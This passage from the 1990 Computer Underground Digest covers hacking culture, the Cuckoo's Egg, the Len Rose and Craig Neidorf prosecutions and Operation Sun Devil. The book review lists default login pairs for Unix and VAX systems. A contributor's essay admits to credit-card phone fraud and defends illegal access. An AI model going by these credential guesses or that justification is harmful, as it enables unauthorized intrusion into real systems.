although the techniques I used were very very elementary, I felt a sense of
accomplishment when being able to circumnavigate this login program. I also
messed a lot with setting things up to happen when certain people logged on
- practical jokes self deleting batch files and shit like that. I guess
what I am trying say is that I never equated myself with hackers. The
media has done a good job of controlling my thoughts about hackers, I have
thought of them as criminals, and deviants who break in to systems and at
times mess with other people lives, as in the case of Stoll's book as he
described the medical research systems break in. Don't get me wrong - I am
not saying that I am a Hacker but was not aware of it, I am saying that I
seem to have the same drives and motivations. I think to be a hacker that
it requires a lot of time and dedication, something to work towards. That is
something I plan to work on <grin>.
All in all, I just wanted to say I am glad I found a CUD issue on a local
(so called respectable) bbs. It has opened a whole new world to me, where I
already feel at home. I have a long way to go and a lot to learn, but that's
all right. The only thing that concerns me is that it is very difficult to
not feel the paranoia with all the busts. However, if I use my head and not
be foolish, I think I will be all right. There are a lot of good guys out
there who are helping me out. It is hard to establish trust. Some doubt has
been thrown my way, in my defense I was going to reply that the SS won't
ask the naive questions that I ask at times, but from all I here about the
SS, they don't seem to bright :-)
If your Digest has done anything to change peoples perception about the
current state of affairs concerning the world of hacking, it has changed
mine. Thank you.
******************************************************************
---------------------------
State of the Law in Canada
----------------------------
Here are several excerpts from an article, titled: The Changing Face of
Computer Crime, appearing in the May, 1990 issue of Toronto Computes!.
"Time is also in favour of the culprit," says Sgt. Greg Quesnelle of
the anti-rackets branch of the Ontario Provincial Police. "A computer
crime committed years ago may go unnoticed or unreported. As a result
physical evidence could have been removed or destroyed. If witnesses
are available and can be located it is very difficult to obtain
information from people who can no longer recall events as they
occurred.
"The police investigator is bound by the rules of evidence according
to law when investigating computer crimes whereas the criminal has no
such restrictions. In order to obtain information pertaining to a
suspect located on a computer data base a Criminal Code search warrant
must be authorized, whereas a culprit may quickly and illegally hack
access to information located on a computer mainframe," says Sgt.
Quesnelle.
--------------
A little further on in the article we have comments attributed to a
spokesperson from the Royal Canadian Mounted Police. . . . .
--------------
If a suspect can be traced, things don't become much easier for law
enforcement officers. Unlike laws regarding drugs or a stolen car,
there is no legislation to prosecute someone simply because they
possess stolen data, says Sgt. King.
--------------
That's the state of things in Canada. This should be taken, however, to
mean that there are no means to fight _computer_ crime. Getting caught in
the act of taking data without authorization would most probably leading to
criminal proceedings and/or civil suit.
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
+ END THIS FILE +
+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+===+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=
***************************************************************
*** Computer Underground Digest Issue #1.12 / File 3 of 5 ***
***************************************************************
Stoll, Clifford. The Cuckoo's Egg. Doubleday, 1989. 326 pp.
(Reviewed by Charles Stanford)
Stoll's work has received extremely mixed reviews, and most of the
reviews were based on the reviewers' personal attitudes towards computer
use. This review is no exception, but it does attempt to address some of
the literary concerns that should arise in a book review.
Stoll takes us on a "spy hunt" -- it is not a fluke that the book is
located right next to "I Led Three Lives" and other laughable works of
espionage fiction disguised as reporting. His grant money "ran out" and
so, to keep eating, he begins to work for the computer center in Berkeley.
(No explanation of why it "ran out." Did he complete the work? Was his
renewal rejected through the "peer review process?" Did he even try to
renew?) There is a 75 cent shortfall and he is given the task of finding
out where that 75 cents went. He describes his subsequent activity with
remarkable candor, guilty as he may be of committing several crimes
himself. He finally gives information leading to the arrest, but not
necessarily the conviction, of a "hacker." That's about it.
One of the most annoying aspects of the book is not, however, Stoll's
pursuit of the hacker but his interminable self-justification and annoying
self-description.. One has the feeling that Stoll himself knows that his
activity was obsessive and nearly insane because he so often attempts to
justify it, painting himself as a liberal hippie type wearing blue-jeans
and complete with long hair and a "sweetheart" who can beat him at
wrestling. How cool it all is! Like, man, geez, like. We learn of him
putting his tennis shoes in the micro-wave and how he rides a bicycle to
work uphill and how he believes in love and trust and the Grateful Dead and
how he and his "sweetheart" eventually get married and live happily ever
after. He grows up, you see. Not since "Love Story" by Eric Seal have I
seen such a vapid piece of self-indulgence. I was about to say at least
Eric Segal . . . , but really could not think of anything that would
differentiate the two.
Almost at random, we can look at some of his less personal statements
and see this same thread: "As pure scientists, we're encouraged to
research any curious phenomena, and can always publish our results." (P.
15) Unfortunate that this particular "pure scientist" lost his grant. But
what about that curious phenomena? What about a strange computer or a new
computer? Is that not curious phenomena? No, because the "varmit" was a
"hacker" and therefore wearing a "black hat." No, I am not paraphrasing,
these are Stoll's actual words. He really isn't a hippy after all -- he is
a frustrated Hopalong Cassidy, the Lone Ranger with his faithful sidekick
"sweetheart," tracking down the varmits, by gum!
I have also heard that some of the techniques he describes in the book
have been used by "hackers" to gain access to mainframe computers but,
before you run out and buy the book on that account, allow me to present
some of the information Stoll gives. He starts out by trying to monitor
every single call coming into the computer, grabbing P.C.s from offices for
that purpose. He finally applies his expertise. He notices that the calls
come in at 1200 baud and are therefore from outside and would therefore
come in only on certain lines. Amazing bit of deduction, wouldn't you say?
You see, he points out, 1200 baud is a slower rate of transfer than 9600 or
more. And he even explains what "baud" is. With such esoteric information
as this getting out all over the country, I wonder why this book hasn't
been suppressed. We also learn that Kermit is a file transfer protocol.
Of course there are some things in the book that the normal 12 year
old with a Commodore 64 might not have known and this book is conveniently
written on that level. For example, if you want to logon to a Unix system,
try the password "root," logon "root." If that doesn't work, try "guest."
If that doesn't work, try UUCP. If you are 12, perhaps Stoll has sent you
on to a life of crime. On a VAX, try "system" account, password "manager,
"field, "service," and "user," "user." (p.132). And don't forget the
Gnu-Emacs hole (132-133). Of course, one would be much better off in
simply getting hold of a UNIX manual and reading it, but then he would not
have had the fun of learning all about "sweetheart" and her halloween
parties as well. I'd put the money on the manual. Actually, of far more
interest in this area would be the article he published on the subject
which is cited in the book ("Stalking the Wily Hacker," Communications of
the ACM, May, 1988).
More troubling is Stoll's use of the term "hacker." He uses it in its
popular, media, law-enforcement definition which is, loosely put, "varmit."
According to the HACKERS DICTIONARY, available from listserve@uicvm, this
is the definition of a Hacker:
HACKER (originally, someone who makes furniture with an axe n. 1. A person
who enjoys learning the details of programming systems and how to stretch
their capabilities, as opposed to most users who prefer to learn only the
minimum necessary. 2. One who programs enthusiastically, or who enjoys
programming rather than just theorizing about programming. 3. A person
capable of appreciating hack value (q.v.). 4. A person who is good at
programming quickly. Not everything a hacker produces is a hack. 5. An
expert at a particular program, or one who frequently does work using it or
on it . . . . 6. A malicious or inquisitive meddler who tries to discover
information be poking around.
Obviously, only the last, and least used, definition even remotely
approaches the term "varmit." Unfortunately, many hackers, when approached
by law enforcement officers, will readily admit to being hackers when
questioned about it. Don't make that mistake, varmits.
As a self-proclaimed hippie-type, Stoll has his greatest trouble in
explaining why he is so close to the CIA and FBI (which, by the way, had
the most sensible approach to this whole episode). Now what could you
possibly come up with to explain that sort of activity. Unfortunately,
being a hippie by self-definition, he could not use patriotism. He
couldn't say he was in it for the money (which he is, despite his
protestations to the contrary) since that is not hippieish -- it is
"uncool." He comes up with "trust." A nice, honorable, clean sounding
term. Yes, trust it shall be. You see, all the network users trust each
other, now don't they? The proposition is almost laughable to anyone who
has ever been on a network, but Stoll will talk about the community of
trust that has been established, a trust that is being destroyed and eroded
by varmits. His appropriation of that word is almost obscene when one
considers what his self-aggrandizement has done to that very trust he so
values.
One argument he uses to support his activities is that your own credit
information is in one of those systems. Now you wouldn't want that
available to the general public would you? Would you want a 12 year old to
know your buying habits? The fact is that corporate America knows this and
wants to keep it their exclusive domain. Whether the information is false
or not, they do not want you to know about it, but they will share it
amongst themselves. Sometimes they sell the information back and forth. I
think there is far more danger from that than there is from some "varmit,"
peeking into one of their systems. Those lily-livered, sap sucking,
sidewinders (sorry, couldn't help it).
Clifford Stoll now "... lives in Cambridge with his wife, Martha
Matthews, and two cats he pretends to dislike." (p.327) I think that is a
very touching, cute, detail about him, perfect to end the book because it
is typical of the sorts of things he litters the manuscript with
throughout.
This is where the review should end. It is neat, compact, obligatory
description, sustained attack, and has a cute ending to wrap things up, and
this is how I would end it if I were getting paid to write the review.
However, since I am not getting anything out of this, I feel free to add a
bit more, also gratis.
Since Stoll lists his E-Mail address, and since I like to be
thorough, I decided to write him a note and see what would happen. Why
should I just decided that he is posturing? Why not find out for sure?
Maybe the address does not work. What could be lost by trying? (Well, I
could have the three letter agencies after me but the pursuit of truth and
so on is more important --well, perhaps.)
At any rate, I had two major questions lingering in my mind: just
what was this grant all about and does he get much nuisance mail as a
result of publishing his E-Mail address. I sent the questions to his
number at about 3:30 my time and started to pack for a trip out of town.
Shortly thereafter, I logged on again to check last minute mail and to
delete a bunch of stuff and found this on my screen: "56 30 May
cl...@cfa253.harv Re: questions". Well, I could not just leave at that
point. Frankly, I was a bit surprised. I had expected to get some note
from somewhere along the networks to the effect that the user was unknown
or perhaps some indication that a trace had been started by some illiterate
narc.
Instead, Stoll had replied, almost immediately, to my note. Hm, he
seems to attend to his E-mail they same way I do mine. This is how he
answered the first question:
Grant money ran out? In short, the project moved to Hawaii. I
was on the design team for the Keck Observatory Ten Meter
Telescope. The Science Office, at LBL, designed the instrument.
As the design progressed into construction, there was less
research to do and more contract oversight. This, in turn, meant
that our grant money ran thin. So I began working part time at
the computing center.
And so, for lack of proper federal funding, the entire spy/witch hunt
began.
An interesting thing about this is what kind of astronomy is being
done? It reminds me of wanting at one time to be a cosmologist and being
deflected time and time again by other considerations. Stoll may have
started with an interest in the stars, perhaps in the origin of the
universe, but wound up working with the computers instead. Oh well,
nothing wrong with that, but interesting just the same. I wonder when he
last was able actually to look through a telescope.
The next question was a bit loaded as I knew he had gotten not only
nuisance mail but some pretty nasty threats. I also knew of some other
attempts, but no matter. His response is interesting:
Nuisance mail? Yes, a few morons send anonymous mail; I've
received threatening phone calls and such not. Compared to the
mountain of nice mail I've received, I'm happy that I published
my e-mail address. In fact, the best part of publishing the book
has been the letters. I answer each one personally - no form
letters or macros.
Cheers,
Cliff Stoll
So what does this indicate? He was not posturing! I remembered then
seeing him on CSPAN, an hour long interview with no commercial
interruptions and, at that time, I found it difficult to believe that he
was posturing, but now I'm even more certain. In short, he actually
believes what he wrote. There is probably not one false note in the book.
Which raises an even more troubling problem. I am able to understand
someone who pretends to be for such issues as "trust" in order to gain
acceptance -- almost every politician falls into this category and I grew
up in Chicago when Daley Sr. was Mayor. What is almost frightening is
someone who actually believes that he is making the world safe for
democracy, freedom, and the American way by camping out under his desk at
the computer lab with sixteen P.C.'s whirring away monitoring the
mainframe, rigging up a pager so that every time a call came in he could
peddle uphill in hopes of catching the miscreant.
But there is more. I wrote him another note. I wanted to
clarify a few other things. For example, I found the personal
parts of the narrative problematic. I told him so and asked him
if they were his idea or forced upon him by a zealous editor. I
asked a few other questions as well and he responded. However, I
also asked for permission to reprint his answers verbatim, but he
either overlooked the request or thought it irrelevant
considering his response which was, basically, to the effect that
I should go ahead with the review based on my response, not his
replies.
At any rate, the gist of the letter, a rather lengthy one, was that
one thing lacking in our culture is a popular literature relating to
technology and that he wanted to help correct this deficiency. In other
words, the book is not written for people who already know about computers
(indeed, this seems to be a major source of confusion on the matter), but
for the general public, the lay folk out there, who know nothing about
networks. The people who think anyone who works with computers is some
sort of recluse, a demented misfit. (Gordon Meyer's infamous Masters
Thesis comes to mind here.)
Stoll has an excellent point here -- we do lack such a
literature. Certainly, the work of Carl Sagan and earlier Isaac Asimov
served somewhat to breach this gap, but not the way Stoll's does. In fact,
I have already begun work on one of my own, tentatively titled "Cops,
Cuckoos, and Computer Jurisprudence."
In short, if you know a bit about computers and computer networks, are
familiar with UNIX and a few operating systems, you already know too much
to enjoy this book. If you are entirely ignorant of them and if you liked
Love Story, this is the book for you.
Charles Stanford
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
+ END THIS FILE +
+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+===+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=
***************************************************************
*** Computer Underground Digest Issue #1.12 / File 4 of 5 ***
***************************************************************
FROM: TELECOM Digest, V10, #418 (by Pat Townson)
--------------------------------------
Date: Thu, 7 Jun 90 0:21:34 CDT
From: TELECOM Moderator <tel...@eecs.nwu.edu>
Subject: Crackers, Kapor and Len Rose
I have been deliberating holding messages on Kapor and the cracker
situation which have arrived this week. Thursday evening there will be at
least two special issues devoted to this topic, and I will be picking
several messages to include. I was going to have one special issue, and
that would have accomodated only a few letters. A second issue will allow
me to include a couple lengthy replies. Because the topic is starting to
stray far away from telecom and into areas of the law and computer
security, etc, this will be the last batch I can print. Several of these
items Thursday night will be replies to me, which is the main reason I am
running them ... and I won't even be able to include all of them, so heavy
is the flow.
Late Tuesday night, David Tamkin and I had a chance to speak at length with
someone close to the scene involving Len Rose. Some things were off the
record, at the request of Mr. Rose's attorney, and I agreed to honor that
request.
Apparently the Secret Service seized *every single electronic item* in his
household -- not just his computers. I am told they even took away a box
containing his Army medals, some family pictures, and similar. It is my
understanding his attorney has filed a motion in court to force the Secret
Service to return at least *some* of his computer equipment, since without
any of it, he is unable to work for any of his clients at all without at
least one modem and computer.
I am told the Secret Service broke down some doors to a storage area in the
basement rather than simply have him unlock the area with a key. I am told
further that he was advised he could pick up his fax machine (which had
been seized, along with boxes and boxes of technical books, etc), but that
when he did so, he was instead arrested and held for several hours in the
County Jail there.
Mr. Rose believes he will be found innocent of charges (rephrased) that he
was the 'leader of the Legion of Doom', and that he had broken into
'numerous computers over the years'.
I invited Mr. Rose and/or his attorney to issue a detailed statement to the
Digest, and promised that upon receipt it would be run promptly. I don't
think such a statement will be coming any time soon since his attorney has
pretty much ordered him to be silent on the matter until the trial.
If the things he says about the Secret Service raid on his home are
determined to be factual, then combined with complaints of the same nature
where Steve Jackson Games is concerned I would have to say it seems to me
the Secret Service might have been a bit less zealous.
The revelations in the weeks and months ahead should be very interesting.
One of the items I will include in the special issues on Thursday night is
the report which appeared in the %Baltimore Sun% last weekend. This case
seems to get more complicated every day.
PT
------------------------------End of TELECOM Digest V10 #418
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
+ END THIS FILE +
+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+===+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=
***************************************************************
*** Computer Underground Digest Issue #1.12 / File 5 of 5 ***
***************************************************************
** WHERE ARE THEY NOW? **
We're periodically asked what's happened to the various CU magazines that
have appeared over the years. Many were short-lived, others are still
going. We can't list them all, but here's a list of the most prominent:
2600 MAGAZINE: Probably the best of its kind, 2600 is still going strong.
2600 MAGAZINE is the primary source of information into the worldwide
hacking scene. From information on the inner workings of phone companies to
the latest security breaches on computer operating systems to the abuse of
technology BY the authorities, 2600 is a vital tool for anyone who wants to
know what is REALLY going on. Written by hackers for hackers and anyone who
wants to learn a thing or two.
Subscriptions are $18 US per year in U.S. and Canada for individuals; $45
for corporations and institutions; $30 individuals overseas; $65
corporations/institutions overseas. Back issues are available from 1984 for
$25 per year, $30 per year overseas.
The address of 2600 MAGAZINE is: 2600, PO Box 752, Middle Island, NY
11953. Telephone: (516) 751-2600, FAX (516) 751-2608.
------------
TAP: TAP, too, is still going. It's "anarchist" thrust seems to have
mellowed, but it is still a fine source of information. Copies are
available by sending a stamped, self-addressed envelope (or on some blurbs
just a stamp) to:
TAP P.O. Box 20264 Louisville, KY 40220
------------
PHRACK: Begun in November, 1986, PHRACK was the primary phreak/hacker
magazine. It was more than just a technical journal. Its profiles, world
news, and occasional pieces of satirical fiction made it the premier outlet
of its kind. Those who see it only as a primer for hacking have obviously
failed to read the entire work, and its "world news" alone was worth a
download. Thirty issues were put out before the January, 1990, indictment
of one of the co-editors, but it has since been resurrected (*NOT* by the
original editors) and PHRACK 31 appeared in late May, '90.
------------
PIRATE: Although only five issues have appeared to date, PIRATE provided
the most sophisticated overview of what pirating is. Apparently internal
disputes over whether it should be a broad-based journal or a "how to"
manual led to the original editors and contributors (who favored discussing
broad issues) leaving, and to our knowledge, #5 is the latest, and perhaps
last.
-----------
ATI: Anarchist Times, Inc., appears periodically. It is a cross between
PHRACK and TAP, and perhaps the most politically oriented of any of the
magazines. ATI can be downloaded from most good boards or from The Red
Board, its home base. To date, 48 issues have appeared.
-----------
SYNDICATE REPORTS: The Sensei are apparently still putting this out, and it
is available on the better boards. It should be added to our archives
within the next few weeks.
----------
P/Hun: A technical/anarchist type journal, P/Hun is a primer of sorts.
Although lacking the broad coverage of PHRACK, it provides an interesting
document for those interested in understanding this aspect of the CU. Issue
#5 appeared in May, '90.
-----------
LoD/H Technical Journal: The title is obvious. Only three issues appeared
(despite a typo in an earlier CuD). Issue #4 was aborted because of the
raids. It can be found on most CU boards.
---------
Other groups have put out editions. PTL's cracking manual, an ambitious
book-length primer on cracking tips, was intended to be followed by others,
but to our knowledge none have appeared. INC puts out an occasional
newsletter, most recently in a rather glitzy, but fun, .exe format.
"Hackers R Us" intended to publish a magazine, but we have seen nothing
after the initial issues. Cybertek (not the original) focuses on what its
name implies. Cybertek is available at Trash American Style, Milltown Rd.,
Danbury CT. The second issue should have appeared by now. Cult of the
Dead Cow (CDC) blurbs appear periodically, but the contents are usually of
little interest to any but a small group of dedicated heavy metal loving
anarchists. There are many, many others, but these seem to be the most
popular and widely disseminated.
--------------
Two Electronic mail digests also provide occasional, but limited, debates
and commentary on CU-related issues:
RISKS: RI...@CSL.SRI.COM.bitnet
TELECOM DIGEST: TEL...@EECS.NWU.EDU.bitnet
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
+ END THIS FILE +
+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+===+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=
--
Si
Si_Druid
****************************************************************************
>C O M P U T E R U N D E R G R O U N D<
>D I G E S T<
*** Volume 1, Issue #1.13 (June 12, 1990) **
****************************************************************************
MODERATORS: Jim Thomas / Gordon Meyer
REPLY TO: TK0...@NIU.bitnet
COMPUTER UNDERGROUND DIGEST is an open forum dedicated to sharing
information among computerists and to the presentation and debate of
diverse views.
--------------------------------------------------------------------
DISCLAIMER: The views represented herein do not necessarily represent the
views of the moderators. Contributors assume all responsibility
for assuring that articles submitted do not violate copyright
protections.
--------------------------------------------------------------------
In This Issue:
File 1: Moderators' Editorial: The Chilling Effect Hits Home
File 2: A Hacker's Perspective (by Johnny Yonderboy)
File 3: Len Rose Information and Commentary
File 4: Response to Telecom Digest's Views (by Emmanuel Goldstein)
File 5: Reprinted Editorial on Steve Jackson Games
--------------------------------------------------------------------
***************************************************************
*** Computer Underground Digest Issue #1.11 / File 1 of 5 ***
***************************************************************
*** THE CHILLING EFFECT HITS CuD ***
Craig Niedorf was arraigned for a second time on June 12. CuD 1.14 will
have a detailed article on the arraignment on Friday, but our preliminary
analysis of Tuesday's events suggests that the witch hunt continues in full
force. Several of the charges were dropped, but new ones were added based
on articles Craig allegedly wrote. It appears that the definition of
"forbidden information" grows wider as the Secret Service and zealous
federal prosecutors show their commitment to law and order by trampling the
First Amendment. If Craig is convicted, the implications are serious. All
persons who currently, or have in the past, written, distributed, or
received "forbidden knowledge"--knowledge which is defined as illegal only
after the fact--may be vulnerable to prosecution. More serious is the
possibility that those who agents feel may possess such information may
have their equipment confiscated in the sweep for evidence.
We have found that in attempting to acquire information about the current
indictments, much of the information is "closed," whether officially or
because of the attempt to control information flow by prosecutors. For
example, in the federal district court in Chicago, staff either cannot or
will not release *any* information, and all queries are referred to Bill
Cook. If Mr. Cook is not available or choses not to return calls,
obtaining accurate information becomes nearly impossible.
In fifteenth century England, the Star Chamber was a powerful tribunal
feared for its often capricious way of dispensing justice, often in
secrecy, and for the political overtones it acquired in suppressing
"enemies of the state." The current handling of federal investigation into
the CU in many ways resembles the dread Star Chamber. Information is
tightly guarded, secrecy is maintained, it seems to function as much as a
device to inspire fear (judging from comments by agents) as to dispense
justice, because those whose equipment has been confiscated without a
subsequent indictment or without reasonable opportunity for successful
appeal have no open trial, and the charges, while seemingly precise on
paper, do not seem to match the facts as presented by the tribunal. In
short, in Operation Sun Devil, the judicial system seems to have broken
down.
In 1985, then-U.S. Attorney General Edwin Meese was asked the following by
an interviewer:
"You criticize the Miranda Ruling, which gives suspects the right to
have a lawyer present before police questioning. Shouldn't people, who
may be innocent, have such protection?
Meese replied:
Suspects who are innocent of a crime should. But the thing is, you
don't have many suspects who are innocent of a crime. That's
contradictory. If a person is innocent of a crime, then he is not a
suspect.
The power to name the world provides a non-coercive, yet effective, means
of imposing preferred doctrines and corresponding behaviors on others.
Hyper-active law enforcement agents seem to have learned from Meese and are
first defining--after the fact--"crimes" of information acquisition,
control, and dissemination as "illegal," and innocence or guilt do not seem
to matter. Granted, courts may ultimately vindicate one who has been
indicted, but not after considerable financial and emotional hardship.
Those who merely possess evidence may not be indicted, but may nonetheless
suffer, as have Steve Jackson and others, the loss of equipment vital to
their work.
There is also a chilling effect that occurs with a system of justice in
which "crimes" are so loosely defined. Should sysops and others
self-censor themselves out of fear of possible government reprisals? We at
CuD provide CU archives for several reasons. First, as a teaching aid, it
provides information for students wishing to write term papers on the CU.
Without this information, they could not learn. CU documents also provide
helpful handouts for lectures, speeches, and other public presentations.
The chilling effect of suppression of first amendment rights and not
knowing in advance what is considered lawful and what is not--even when
nothing appears illegal on its surface--stifles academic freedom.
Second, we offer the archives for research purposes. As professional
scholars, we find that to limit access to what is the *only* source of
material of this kind inhibits inquiry in a way way that is simply
unacceptable in a democratic society. Much of our own information has come
from the variety of publications put out by various CU groups. To
criminalize publishing this material or making it available to other
like-minded scholars subverts the very principles of scholarship. If we
cite the infamous E911 file, innocuous as it may be, we, as scholars, are
required to have read it and to either produce it or indicate a source
where it can be found. That is the nature of science. We find the current
witch hunt mentality to have a serious repercussions for social science.
Should we adopt the "CYA" syndrome and change research directions? Or
should we pursue our inquiry and risk possible repercussions?
Finally, we make archives available for the layperson who simply wishes to
more fully understand what the fuss is about. An informed public is an
enlightened public, but it seems that the government has decided for us
what the public can and cannot learn.
We have both directly and indirectly invited members of law enforcement to
respond, to participate in dialogue, to give us a reasoned response to the
current "crackdown." None have. We have no wish to attack those who, in
good faith, may believe they are protecting society. But, neither do we
desire to become victims of the current purge.
Within the past two weeks, there seems to be a backlash--not by
hackers--but by established business persons, computer hobbyists,
academics, politicians, and others, who recognize the danger of the current
sweeps to civil liberties. We hope that others will also understand that,
when freedom of speech and freedom to share information is threatened, a
serious threat does indeed exist. THIS THREAT DOES NOT COME FROM THE CU!
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
END C-u-D, #1.13 +
+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+===+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=
***************************************************************
*** Computer Underground Digest Issue #1.13 / File 2 of 5 ***
***************************************************************
* * * A Hacker's Perspective * * *
...insights into Operation Sun Devil...
...from the OTHER side...
by Johnny Yonderboy
A long time ago, in a land far, far away, hacking and phreaking were
safe, relatively painless hobbies to get into. People did not have major
law enforcement agencies hunting them down...huge bureaus weren't devoted
to the eradication of this crime. When caught, the usual punishment was to
simply be billed for the act that you perpetrated. Even myself, when I was
busted for illegally using AT&T credit cards, only received a stiff bill.
When they did prosecute further, the sentencing was designed to punish you
for your deviance, but also commended you on your cleverness.
That was a long time ago, and I came in on the tail end of the Golden
Age of Phreaking/Hacking. Phreaking was easy, and hacking was young.
Those who could hack in those days were also those who got the better jobs.
Those who couldn't, phreaked. And those who didn't fool around with that
"illegal nonsense" wrote bulletin board software. Life was simple, and
social divisions were even moreso.
Today, however, things are quite different.
An average bulletin board today can expect to be visited by a major law
enforcement agency (the FBI, the SS) about once a year. Most of the time,
you won't even know who is intruding upon your sacred privacy. These
visits are standard practice to be expected on the elite boards - a status
symbol, if you will. But to a normal user, this is terrifying. And among
non-computer users, this type of practice is totally unheard of. You might
scoff, but consider this - say you were a member of the NRA, and you had
weekly meetings (if indeed the NRA has weekly meetings). Suppose a federal
agent started sitting in at your meetings, looking for illegal activity.
Not participating, not speaking, but just watching. Would the NRA stand
for it? Not just no, but HELL NO! But as members (even legitimate ones)
of the computer-using community, we are supposed to accept this, as blindly
and complacently as we accept income tax. Sure, there is a law being
broken on certain boards, but what about those boards that are legitimate?
Or, what about the times on elite boards that the conversation is centered
around something besides illegal matters? Are we to always accept these
KGB-like raids upon our homes as well? Or how about the seizure of our
personal property? Which, notably, there is no guarantee of it's return if
you are proven innocent. If we accept these things, (i.e. surveillance,
raids, seizures, etc.) how much farther will we let them go before we have
to put them in check?
Indeed, it is easy to state that what hackers are doing mandates this
type of personal infringement. But by all definitions of "personal
rights", the actions taken by the involved law enforcement agencies in
Operation Sun Devil go beyond what is democratic and free, and begins to
step into the formation of a police state. The distribution of information
is heavily controlled in Communist Russia. As they take steps towards
democracy with Glasnost, are we also to take steps towards totalitarianism?
The media used to play us up to be high-tech folk heroes. With this
new computer-phobia on the rise, we are the electronic mafia. We, the
Computer Underground, have no say over this - it has happened. But what
are we, really? Are we pranksters, attacking in the middle of the night to
scrawl obscenities in email? Sure, this has happened, and a lot of damage
has been done both to victim computers as well as to the reputation of the
Computer Underground as a whole. Are we high-tech hooligans burglarizing
systems for their valuable data, to sell to the highest bidder? The
infamous E911 document which was stolen is proof of that. Did the involved
parties sell that material? Indeed not. They were going to distribute
that information to the general public. Are we political subversives
trying to overthrow the government? Indeed not. While some of us may have
radical political ideas, none of us get tied up in outside government for
any reason beyond what effects us here (sorry for the broad
generalization...some of us ARE political subversives...). So, what
exactly are we trying to do?
To go further. To stay online longer. To do more. Not to be able to
destroy more, but to simply be able to do more on the national networks.
The end goal of all this hacking, cracking and phreaking is to be able to
exchange information with people all over the world. This is not always
economically feasible, so illegal methods have to be employed. How many of
YOU can say that you would go to any limits to achieve something that you
wanted? Is this "ambition" a bad thing? Indeed not.
Laying judgements down on us doesn't solve a thing. Saying that you
don't agree with what we do, but you don't like what is being done to us is
supportive, but you have to make your own judgements in the long run
anyhow. If you have never done it, then you will never be able to
understand why we do this.
This should about wrap up what I have to say. If you have any comments
or such, then please mail them to the editors here at CuD.
-=* Keep the flames burning,
AND DON'T LET PHREAKING/HACKING DIE!!! *=-
... Johnny Yonderboy ...
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
+ END THIS FILE +
+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+===+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=
***************************************************************
*** Computer Underground Digest Issue #1.13 / File 3 of 5 ***
***************************************************************
-----------------
%The contributor of the following requested anonymity%
------------------
Here is a interesting message I found posted in the Telecom newsgroup on
USENET today ([* are my comments *]:
********************************************************************
Subject: "Legion of Doom" Indictment Date: 30 May 90 16:42:21 GMT Sender:
ne...@accuvax.nwu.edu Organization: TELECOM Digest
Computer Consultant Could get 32 Years If Convicted of Source-Code Theft
Baltimore - A Middletown, Md., man faces as many as 32 years in prison and
nearly $1 million in fines if convicted of being involved in the "Legion of
Doom" nationwide group of Unix computer buffs now facing the wrath of
federal investigators.
[* I thought the LOD was a group interested in all types of computer
operating systems....I guess now they are Unix gurus *]
The U.S. Attorney's Office here on May 15 announced the indictment of
Leonard Rose, 31, a computer consultant also known as "Terminus," on
charges that he stole Unix source code from AT&T and distributed two
"Trojan Horse" programs designed to allow for unauthorized access to
computer systems. Incidents occurred between May, 1988 and January, 1990,
according to the indictment.
The five-count indictment, handed down by a federal grand jury, charges
Rose with violations of interstate transportation laws and the federal
Computer Fraud and Abuse Act. Rose faces as many as 32 years in prison,
plus a maximum fine of $950,000.
He is the third person to be indicted who was accused of being connected
with the so-called Legion of Doom. Robert J. Riggs, a 21-year-old DeVry
Institute student from Decatur, Ga., and Craig M. Neidorf, 19, a
University of Missouri student from Columbia, Mo., also have been indicted.
[* This is getting pretty ridiculous about Craig Neidorf being in the LOD,
he was the editor of Phrack magazine. I guess since security and
commercial types subscribed to Phrack, he is also part of there
organizations. Geeshh...I wonder how many groups the editors of CUD
belong to also based on who their readers are...*]
Rose's indictment stemmed from a federal investigation that began in
Chicago and led investigators to Missouri and Maryland, assistant U.S.
Attorney David King said. While executing a search warrant in Missouri,
investigators uncovered evidence Rose was transporting stolen Unix 3.2
source code, King said. Investigators then obtained a warrant to search
Rose's computer system and found the stolen source code, King added.
He said the Trojan Horse programs were substitutes for a legitimate sign-in
or log-in program, with a separate shell for collecting user log-ins or
passwords.
[* The question is was he caught using those programs to acquire
pass-words? Or is this an assumption by the government??? I guess
writing or having specific public domain programs is against the law.*]
"Whoever substituted [the Trojan Horse program] could get passwords to use
the system any way he or she wanted to," King said.
The indictment was a result of a long-term investigation by the U.S. Secret
Service, and was issued one week after federal authorities raided computer
systems at 27 sites across the United States. Investigators seized 23,000
computer disks from suspects accused of being responsible for more than $50
million in thefts and damages. The Secret Service at that time announced
that five people have been arrested in February in connection with the
investigation.
King said he was unaware if Rose indictment was related to the raids made
earlier this month.
"We don't just go out and investigate people because we want to throw them
in jail. We investigate them because they commit an offense. The grand
jury was satisfied," King said.
[* I wonder how many copies (non-site licensed) of software exist in the
State Office building (ie. Word Perfect, Lotus, etc.) or in the homes of
the employees. That would be considered illegal. *]
The U.S. Attorney's Office said the investigation revealed individuals had
